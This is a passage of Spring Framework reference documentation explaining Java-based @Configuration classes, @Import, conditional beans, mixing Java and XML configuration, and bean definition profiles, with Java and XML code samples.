asyncCommand() {\n\t\tAsyncCommand command = new AsyncCommand();\n\t\t\/\/ inject dependencies here as required\n\t\treturn command;\n\t}\n\n\t@Bean\n\tpublic CommandManager commandManager() {\n\t\t\/\/ return new anonymous implementation of CommandManager with command() overridden\n\t\t\/\/ to return a new prototype Command object\n\t\treturn new CommandManager() {\n\t\t\tprotected Command createCommand() {\n\t\t\t\treturn asyncCommand();\n\t\t\t}\n\t\t}\n\t}\n----\n\n\n[[beans-java-further-information-java-config]]\n==== Further information about how Java-based configuration works internally\n\nThe following example shows a `@Bean` annotated method being called twice:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic ClientService clientService1() {\n\t\t\tClientServiceImpl clientService = new ClientServiceImpl();\n\t\t\tclientService.setClientDao(clientDao());\n\t\t\treturn clientService;\n\t\t}\n\n\t\t@Bean\n\t\tpublic ClientService clientService2() {\n\t\t\tClientServiceImpl clientService = new ClientServiceImpl();\n\t\t\tclientService.setClientDao(clientDao());\n\t\t\treturn clientService;\n\t\t}\n\n\t\t@Bean\n\t\tpublic ClientDao clientDao() {\n\t\t\treturn new ClientDaoImpl();\n\t\t}\n\n\t}\n----\n\n`clientDao()` has been called once in `clientService1()` and once in `clientService2()`.\nSince this method creates a new instance of `ClientDaoImpl` and returns it, you would\nnormally expect having 2 instances (one for each service). That definitely would be\nproblematic: in Spring, instantiated beans have a `singleton` scope by default. This is\nwhere the magic comes in: All `@Configuration` classes are subclassed at startup-time\nwith `CGLIB`. In the subclass, the child method checks the container first for any\ncached (scoped) beans before it calls the parent method and creates a new instance. Note\nthat as of Spring 3.2, it is no longer necessary to add CGLIB to your classpath because\nCGLIB classes have been repackaged under `org.springframework.cglib` and included directly\nwithin the spring-core JAR.\n\n[NOTE]\n====\nThe behavior could be different according to the scope of your bean. We are talking\nabout singletons here.\n====\n\n[TIP]\n====\nThere are a few restrictions due to the fact that CGLIB dynamically adds features at\nstartup-time, in particular that configuration classes must not be final. However, as\nof 4.3, any constructors are allowed on configuration classes, including the use of\n`@Autowired` or a single non-default constructor declaration for default injection.\n\nIf you prefer to avoid any CGLIB-imposed limitations, consider declaring your `@Bean`\nmethods on non-`@Configuration` classes, e.g. on plain `@Component` classes instead.\nCross-method calls between `@Bean` methods won't get intercepted then, so you'll have\nto exclusively rely on dependency injection at the constructor or method level there.\n====\n\n\n\n[[beans-java-composing-configuration-classes]]\n=== Composing Java-based configurations\n\n\n[[beans-java-using-import]]\n==== Using the @Import annotation\n\nMuch as the `<import\/>` element is used within Spring XML files to aid in modularizing\nconfigurations, the `@Import` annotation allows for loading `@Bean` definitions from\nanother configuration class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ConfigA {\n\n\t \t@Bean\n\t\tpublic A a() {\n\t\t\treturn new A();\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import(ConfigA.class)\n\tpublic class ConfigB {\n\n\t\t@Bean\n\t\tpublic B b() {\n\t\t\treturn new B();\n\t\t}\n\n\t}\n----\n\nNow, rather than needing to specify both `ConfigA.class` and `ConfigB.class` when\ninstantiating the context, only `ConfigB` needs to be supplied explicitly:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(ConfigB.class);\n\n\t\t\/\/ now both beans A and B will be available...\n\t\tA a = ctx.getBean(A.class);\n\t\tB b = ctx.getBean(B.class);\n\t}\n----\n\nThis approach simplifies container instantiation, as only one class needs to be dealt\nwith, rather than requiring the developer to remember a potentially large number of\n`@Configuration` classes during construction.\n\n[TIP]\n====\nAs of Spring Framework 4.2, `@Import` also supports references to regular component\nclasses, analogous to the `AnnotationConfigApplicationContext.register` method.\nThis is particularly useful if you'd like to avoid component scanning, using a few\nconfiguration classes as entry points for explicitly defining all your components.\n====\n\n[[beans-java-injecting-imported-beans]]\n===== Injecting dependencies on imported @Bean definitions\n\nThe example above works, but is simplistic. In most practical scenarios, beans will have\ndependencies on one another across configuration classes. When using XML, this is not an\nissue, per se, because there is no compiler involved, and one can simply declare\n`ref=\"someBean\"` and trust that Spring will work it out during container initialization.\nOf course, when using `@Configuration` classes, the Java compiler places constraints on\nthe configuration model, in that references to other beans must be valid Java syntax.\n\nFortunately, solving this problem is simple. As <<beans-java-dependencies,we already discussed>>,\n`@Bean` method can have an arbitrary number of parameters describing the bean\ndependencies. Let's consider a more real-world scenario with several `@Configuration`\nclasses, each depending on beans declared in the others:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService(AccountRepository accountRepository) {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n\n\t@Configuration\n\tpublic class RepositoryConfig {\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository(DataSource dataSource) {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, RepositoryConfig.class})\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return new DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\t\/\/ everything wires up across configuration classes...\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\nThere is another way to achieve the same result. Remember that `@Configuration` classes are\nultimately just another bean in the container: This means that they can take advantage of\n`@Autowired` and `@Value` injection etc just like any other bean!\n\n[WARNING]\n====\nMake sure that the dependencies you inject that way are of the simplest kind only. `@Configuration`\nclasses are processed quite early during the initialization of the context and forcing a dependency\nto be injected this way may lead to unexpected early initialization. Whenever possible, resort to\nparameter-based injection as in the example above.\n\nAlso, be particularly careful with `BeanPostProcessor` and `BeanFactoryPostProcessor` definitions\nvia `@Bean`. Those should usually be declared as `static @Bean` methods, not triggering the\ninstantiation of their containing configuration class. Otherwise, `@Autowired` and `@Value` won't\nwork on the configuration class itself since it is being created as a bean instance too early.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate AccountRepository accountRepository;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n\n\t@Configuration\n\tpublic class RepositoryConfig {\n\n\t\tprivate final DataSource dataSource;\n\n\t\t@Autowired\n\t\tpublic RepositoryConfig(DataSource dataSource) {\n\t\t\tthis.dataSource = dataSource;\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, RepositoryConfig.class})\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return new DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\t\/\/ everything wires up across configuration classes...\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\n[TIP]\n====\nConstructor injection in `@Configuration` classes is only supported as of Spring\nFramework 4.3. Note also that there is no need to specify `@Autowired` if the target\nbean defines only one constructor; in the example above, `@Autowired` is not necessary\non the `RepositoryConfig` constructor.\n====\n\n.[[beans-java-injecting-imported-beans-fq]]Fully-qualifying imported beans for ease of navigation\n--\nIn the scenario above, using `@Autowired` works well and provides the desired\nmodularity, but determining exactly where the autowired bean definitions are declared is\nstill somewhat ambiguous. For example, as a developer looking at `ServiceConfig`, how do\nyou know exactly where the `@Autowired AccountRepository` bean is declared? It's not\nexplicit in the code, and this may be just fine. Remember that the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite] provides tooling that\ncan render graphs showing how everything is wired up - that may be all you need. Also,\nyour Java IDE can easily find all declarations and uses of the `AccountRepository` type,\nand will quickly show you the location of `@Bean` methods that return that type.\n\nIn cases where this ambiguity is not acceptable and you wish to have direct navigation\nfrom within your IDE from one `@Configuration` class to another, consider autowiring the\nconfiguration classes themselves:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate RepositoryConfig repositoryConfig;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\t\/\/ navigate 'through' the config class to the @Bean method!\n\t\t\treturn new TransferServiceImpl(repositoryConfig.accountRepository());\n\t\t}\n\n\t}\n----\n\nIn the situation above, it is completely explicit where `AccountRepository` is defined.\nHowever, `ServiceConfig` is now tightly coupled to `RepositoryConfig`; that's the\ntradeoff. This tight coupling can be somewhat mitigated by using interface-based or\nabstract class-based `@Configuration` classes. Consider the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate RepositoryConfig repositoryConfig;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(repositoryConfig.accountRepository());\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic interface RepositoryConfig {\n\n\t\t@Bean\n\t\tAccountRepository accountRepository();\n\n\t}\n\n\t@Configuration\n\tpublic class DefaultRepositoryConfig implements RepositoryConfig {\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(...);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, DefaultRepositoryConfig.class}) \/\/ import the concrete config!\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\nNow `ServiceConfig` is loosely coupled with respect to the concrete\n`DefaultRepositoryConfig`, and built-in IDE tooling is still useful: it will be easy for\nthe developer to get a type hierarchy of `RepositoryConfig` implementations. In this\nway, navigating `@Configuration` classes and their dependencies becomes no different\nthan the usual process of navigating interface-based code.\n--\n\n\n[[beans-java-conditional]]\n==== Conditionally include @Configuration classes or @Bean methods\n\nIt is often useful to conditionally enable or disable a complete `@Configuration` class,\nor even individual `@Bean` methods, based on some arbitrary system state. One common\nexample of this is to use the `@Profile` annotation to activate beans only when a specific\nprofile has been enabled in the Spring `Environment` (see <<beans-definition-profiles>>\nfor details).\n\nThe `@Profile` annotation is actually implemented using a much more flexible annotation\ncalled {api-spring-framework}\/context\/annotation\/Conditional.html[`@Conditional`].\nThe `@Conditional` annotation indicates specific\n`org.springframework.context.annotation.Condition` implementations that should be\nconsulted before a `@Bean` is registered.\n\nImplementations of the `Condition` interface simply provide a `matches(...)`\nmethod that returns `true` or `false`. For example, here is the actual\n`Condition` implementation used for `@Profile`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Override\n\tpublic boolean matches(ConditionContext context, AnnotatedTypeMetadata metadata) {\n\t\tif (context.getEnvironment() != null) {\n\t\t\t\/\/ Read the @Profile annotation attributes\n\t\t\tMultiValueMap<String, Object> attrs = metadata.getAllAnnotationAttributes(Profile.class.getName());\n\t\t\tif (attrs != null) {\n\t\t\t\tfor (Object value : attrs.get(\"value\")) {\n\t\t\t\t\tif (context.getEnvironment().acceptsProfiles(((String[]) value))) {\n\t\t\t\t\t\treturn true;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false;\n\t\t\t}\n\t\t}\n\t\treturn true;\n\t}\n----\n\nSee the {api-spring-framework}\/context\/annotation\/Conditional.html[\n`@Conditional` javadocs] for more detail.\n\n[[beans-java-combining]]\n==== Combining Java and XML configuration\n\nSpring's `@Configuration` class support does not aim to be a 100% complete replacement\nfor Spring XML. Some facilities such as Spring XML namespaces remain an ideal way to\nconfigure the container. In cases where XML is convenient or necessary, you have a\nchoice: either instantiate the container in an \"XML-centric\" way using, for example,\n`ClassPathXmlApplicationContext`, or in a \"Java-centric\" fashion using\n`AnnotationConfigApplicationContext` and the `@ImportResource` annotation to import XML\nas needed.\n\n[[beans-java-combining-xml-centric]]\n===== XML-centric use of @Configuration classes\n\nIt may be preferable to bootstrap the Spring container from XML and include\n`@Configuration` classes in an ad-hoc fashion. For example, in a large existing codebase\nthat uses Spring XML, it will be easier to create `@Configuration` classes on an\nas-needed basis and include them from the existing XML files. Below you'll find the\noptions for using `@Configuration` classes in this kind of \"XML-centric\" situation.\n\n.[[beans-java-combining-xml-centric-declare-as-bean]]Declaring @Configuration classes as plain Spring `<bean\/>` elements\n--\nRemember that `@Configuration` classes are ultimately just bean definitions in the\ncontainer. In this example, we create a `@Configuration` class named `AppConfig` and\ninclude it within `system-test-config.xml` as a `<bean\/>` definition. Because\n`<context:annotation-config\/>` is switched on, the container will recognize the\n`@Configuration` annotation and process the `@Bean` methods declared in `AppConfig`\nproperly.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Autowired\n\t\tprivate DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferService(accountRepository());\n\t\t}\n\n\t}\n----\n\n*system-test-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<!-- enable processing of annotations such as @Autowired and @Configuration -->\n\t\t<context:annotation-config\/>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\n\t\t<bean class=\"com.acme.AppConfig\"\/>\n\n\t\t<bean class=\"org.springframework.jdbc.datasource.DriverManagerDataSource\">\n\t\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\n*jdbc.properties*:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.url=jdbc:hsqldb:hsql:\/\/localhost\/xdb\njdbc.username=sa\njdbc.password=\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"classpath:\/com\/acme\/system-test-config.xml\");\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nIn `system-test-config.xml` above, the `AppConfig` `<bean\/>` does not declare an `id`\nelement. While it would be acceptable to do so, it is unnecessary given that no other\nbean will ever refer to it, and it is unlikely that it will be explicitly fetched from\nthe container by name. Likewise with the `DataSource` bean - it is only ever autowired\nby type, so an explicit bean `id` is not strictly required.\n====\n--\n\n.[[beans-java-combining-xml-centric-component-scan]] Using <context:component-scan\/> to pick up `@Configuration` classes\n--\nBecause `@Configuration` is meta-annotated with `@Component`, `@Configuration`-annotated\nclasses are automatically candidates for component scanning. Using the same scenario as\nabove, we can redefine `system-test-config.xml` to take advantage of component-scanning.\nNote that in this case, we don't need to explicitly declare\n`<context:annotation-config\/>`, because `<context:component-scan\/>` enables the same\nfunctionality.\n\n*system-test-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<!-- picks up and registers AppConfig as a bean definition -->\n\t\t<context:component-scan base-package=\"com.acme\"\/>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\n\t\t<bean class=\"org.springframework.jdbc.datasource.DriverManagerDataSource\">\n\t\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n--\n\n[[beans-java-combining-java-centric]]\n===== @Configuration class-centric use of XML with @ImportResource\n\nIn applications where `@Configuration` classes are the primary mechanism for configuring\nthe container, it will still likely be necessary to use at least some XML. In these\nscenarios, simply use `@ImportResource` and define only as much XML as is needed. Doing\nso achieves a \"Java-centric\" approach to configuring the container and keeps XML to a\nbare minimum.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ImportResource(\"classpath:\/com\/acme\/properties-config.xml\")\n\tpublic class AppConfig {\n\n\t\t@Value(\"${jdbc.url}\")\n\t\tprivate String url;\n\n\t\t@Value(\"${jdbc.username}\")\n\t\tprivate String username;\n\n\t\t@Value(\"${jdbc.password}\")\n\t\tprivate String password;\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new DriverManagerDataSource(url, username, password);\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tproperties-config.xml\n\t<beans>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\t<\/beans>\n----\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.properties\njdbc.url=jdbc:hsqldb:hsql:\/\/localhost\/xdb\njdbc.username=sa\njdbc.password=\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\t\/\/ ...\n\t}\n----\n\n[[beans-environment]]\n== Environment abstraction\n\nThe {api-spring-framework}\/core\/env\/Environment.html[`Environment`]\nis an abstraction integrated in the container that models two key\naspects of the application environment: <<beans-definition-profiles,_profiles_>>\nand <<beans-property-source-abstraction,_properties_>>.\n\nA _profile_ is a named, logical group of bean definitions to be registered with the\ncontainer only if the given profile is active. Beans may be assigned to a profile\nwhether defined in XML or via annotations. The role of the `Environment` object with\nrelation to profiles is in determining which profiles (if any) are currently active,\nand which profiles (if any) should be active by default.\n\nProperties play an important role in almost all applications, and may originate from\na variety of sources: properties files, JVM system properties, system environment\nvariables, JNDI, servlet context parameters, ad-hoc Properties objects, Maps, and so\non. The role of the `Environment` object with relation to properties is to provide the\nuser with a convenient service interface for configuring property sources and resolving\nproperties from them.\n\n[[beans-definition-profiles]]\n=== Bean definition profiles\n\nBean definition profiles is a mechanism in the core container that allows for\nregistration of different beans in different environments. The word _environment_\ncan mean different things to different users and this feature can help with many\nuse cases, including:\n\n* working against an in-memory datasource in development vs looking up that same\ndatasource from JNDI when in QA or production\n* registering monitoring infrastructure only when deploying an application into a\nperformance environment\n* registering customized implementations of beans for customer A vs. customer\nB deployments\n\nLet's consider the first use case in a practical application that requires a\n`DataSource`. In a test environment, the configuration may look like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\tpublic DataSource dataSource() {\n\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t.addScript(\"my-schema.sql\")\n\t\t\t.addScript(\"my-test-data.sql\")\n\t\t\t.build();\n\t}\n----\n\nLet's now consider how this application will be deployed into a QA or production\nenvironment, assuming that the datasource for the application will be registered\nwith the production application server's JNDI directory. Our `dataSource` bean\nnow looks like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\tpublic DataSource dataSource() throws Exception {\n\t\tContext ctx = new InitialContext();\n\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t}\n----\n\nThe problem is how to switch between using these two variations based on the\ncurrent environment. Over time, Spring users have devised a number of ways to\nget this done, usually relying on a combination of system environment variables\nand XML `<import\/>` statements containing `${placeholder}` tokens that resolve\nto the correct configuration file path depending on the value of an environment\nvariable. Bean definition profiles is a core container feature that provides a\nsolution to this problem.\n\nIf we generalize the example use case above of environment-specific bean\ndefinitions, we end up with the need to register certain bean definitions in\ncertain contexts, while not in others. You could say that you want to register a\ncertain profile of bean definitions in situation A, and a different profile in\nsituation B. Let's first see how we can update our configuration to reflect\nthis need.\n\n[[beans-definition-profiles-java]]\n==== @Profile\n\nThe {api-spring-framework}\/context\/annotation\/Profile.html[`@Profile`]\nannotation allows you to indicate that a component is eligible for registration\nwhen one or more specified profiles are active. Using our example above, we\ncan rewrite the `dataSource` configuration as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"dev\")**\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"production\")**\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[NOTE]\n====\nAs mentioned before, with `@Bean` methods, you will typically choose to use programmatic\nJNDI lookups: either using Spring's `JndiTemplate`\/`JndiLocatorDelegate` helpers or the\nstraight JNDI `InitialContext` usage shown above, but not the `JndiObjectFactoryBean`\nvariant which would force you to declare the return type as the `FactoryBean` type.\n====\n\n`@Profile` can be used as a <<beans-meta-annotations,meta-annotation>> for the purpose\nof creating a custom _composed annotation_. The following example defines a custom\n`@Production` annotation that can be used as a drop-in replacement for\n`@Profile(\"production\")`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t**@Profile(\"production\")**\n\tpublic @interface Production {\n\t}\n----\n\n`@Profile` can also be declared at the method level to include only one particular bean\nof a configuration class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\t**@Profile(\"dev\")**\n\t\tpublic DataSource devDataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\n\t\t@Bean\n\t\t**@Profile(\"production\")**\n\t\tpublic DataSource productionDataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[TIP]\n====\nIf a `@Configuration` class is marked with `@Profile`, all of the `@Bean` methods and\n`@Import` annotations associated with that class will be bypassed unless one or more of\nthe specified profiles are active. If a `@Component` or `@Configuration` class is marked\nwith `@Profile({\"p1\", \"p2\"})`, that class will not be registered\/processed unless\nprofiles 'p1' and\/or 'p2' have been activated. If a given profile is prefixed with the\nNOT operator (`!`), the annotated element will be registered if the profile is **not**\nactive. For example, given `@Profile({\"p1\", \"!p2\"})`, registration will occur if profile\n'p1' is active or if profile 'p2' is not active.\n====\n\n[[beans-definition-profiles-xml]]\n=== XML bean definition profiles\n\nThe XML counterpart is the `profile` attribute of the `<beans>` element. Our sample\nconfiguration above can be rewritten in two XML files as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans profile=\"dev\"\n\t\txmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t<\/jdbc:embedded-database>\n\t<\/beans>\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans profile=\"production\"\n\t\txmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t<\/beans>\n----\n\nIt is also possible to avoid that split and nest `<beans\/>` elements within the same file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<!-- other bean definitions -->\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\t<\/beans>\n----\n\nThe `spring-bean.xsd` has been constrained to allow such elements only as the\nlast ones in the file. This should help provide flexibility without incurring\nclutter in the XML files.\n\n[[beans-definition-profiles-enable]]\n==== Activating a profile\n\nNow that we have updated our configuration, we still need to instruct Spring which\nprofile is active. If we started our sample application right now, we would see\na `NoSuchBeanDefinitionException` thrown, because the container could not find\nthe Spring bean named `dataSource`.\n\nActivating a profile can be done in several ways, but the most straightforward is to do\nit programmatically against the `Environment` API which is available via an\n`ApplicationContext`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\tctx.getEnvironment().setActiveProfiles(\"dev\");\n\tctx.register(SomeConfig.class, StandaloneDataConfig.class, JndiDataConfig.class);\n\tctx.refresh();\n----\n\nIn addition, profiles may also be activated declaratively through the\n`spring.profiles.active` property which may be specified through system environment\nvariables, JVM system properties, servlet context parameters in `web.xml`, or even as an\nentry in JNDI (see <<beans-property-source-abstraction>>). In integration tests, active\nprofiles can be declared via the `@ActiveProfiles` annotation in the `spring-test` module\n(see <<testcontext-ctx-management-env-profiles>>).\n\nNote that profiles are not an \"either-or\" proposition; it is possible to activate multiple\nprofiles at once. Programmatically, simply provide multiple profile names to the\n`setActiveProfiles()` method, which accepts `String...` varargs:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tctx.getEnvironment().setActiveProfiles(\"profile1\", \"profile2\");\n----\n\nDeclaratively, `spring.profiles.active` may accept a comma-separated list of profile names:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t-Dspring.profiles.active=\"profile1,profile2\"\n----\n\n[[beans-definition-profiles-default]]\n==== Default profile\n\nThe _default_ profile represents the profile that is enabled by default. Consider the\nfollowing:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"default\")**\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\nIf no profile is active, the `dataSource` above will be created; this can be\nseen as a way to provide a _default_ definition for one or more beans. If any\nprofile is enabled, the _default_ profile will not apply.\n\nThe name of the default profile can be changed using `setDefaultProfiles()` on\nthe `Environment` or declaratively using the `spring.profiles.default` property.\n\n[[beans-property-source-abstraction]]\n=== PropertySource abstraction\n\nSpring's `Environment` abstraction provides search operations over a configurable\nhierarchy of property sources. To explain fully, consider the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nApplicationContext ctx = new GenericApplicationContext();\nEnvironment env = ctx.getEnvironment();\nboolean 